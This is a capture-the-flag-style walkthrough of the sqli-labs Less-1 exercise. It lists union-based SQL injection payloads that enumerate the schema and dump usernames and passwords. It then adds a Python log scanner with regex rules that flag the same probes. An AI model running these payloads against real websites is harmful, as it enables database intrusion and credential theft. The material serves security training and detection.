sqli-labs walkthrough
Appending a backslash \ to the id value produces a syntax error, which shows that the parameter is enclosed in single quotes.
1. Determine the number of columns
There are 3 columns
?id=1' and 1=1 order by 3 -- qwe //page renders normally
?id=1' and 1=1 order by 4 -- qwe //error
2. Find which columns are echoed on the page
?id=1' and 1=2 union select 1,2,3 -- qwe
3. Get the database name
?id=1' and 1=2 union select 1,database(),3 -- qwe //database name is security
4. Get the table names
The tables are emails, referers, uagents, users
?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- qwe
5. Get the column names
Query the users table:
Columns: id, username, password
?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='users' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- qwe
6. Dump the data
?id=1' and 1=2 union select 1,username,3 from users limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,password,0x3c,0x68,0x72,0x2F,0x3E),3 from users limit 0,1 -- qwe
The hex literals are separators: 0x3a is ':' between the fields, and 0x3c,0x68,0x72,0x2F,0x3E spell '<hr/>' so each row is rendered on its own line.
0x3a :
0x3c <
0x68 h
0x72 r
0x2F /
0x3E >
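From the defender's side, each step above leaves a distinctive footprint in the web server's access log (ORDER BY probing, UNION SELECT markers, information_schema reads, trailing comments). The following added example, which is not part of the original walkthrough, scans constructed Apache-style log lines for those patterns and reports which enumeration stage each request matches; the log lines, IP addresses and rule names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access log lines (not from the original page); the query strings
# follow the shapes of the sqli-labs payloads shown in the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 1234
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20and%201=1%20order%20by%204%20--%20qwe HTTP/1.1" 200 987
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),3%20--%20qwe HTTP/1.1" 200 1100
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-1/?id=1%27%20and%201=2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--%20qwe HTTP/1.1" 200 1300
"""

# One rule per enumeration stage seen in the walkthrough (rule names are assumed).
RULES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_marker_probe", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("comment_truncation", re.compile(r"(--\s|#|/\*)")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(value: str) -> str:
    """parse_qs already decoded once; decode again to catch double-encoded
    payloads, then lower-case and collapse whitespace so the rules stay simple."""
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()


def classify_request(log_line: str) -> dict:
    """Return {param_name: {rule names}} for every parameter that matches a rule."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        flags = {label for v in values for label, rx in RULES if rx.search(normalize(v))}
        if flags:
            hits[name] = flags
    return hits


def scan(log_text: str) -> list:
    """Return (line_number, hits) for each request that triggers at least one rule."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        hits = classify_request(line)
        if hits:
            findings.append((number, hits))
    return findings
```

A run over SAMPLE_LOG flags lines 2 to 4 and leaves the plain ?id=1 request alone; in practice the same rules are worth pairing with a parameterized query on the server so that the probes stop working rather than merely being logged.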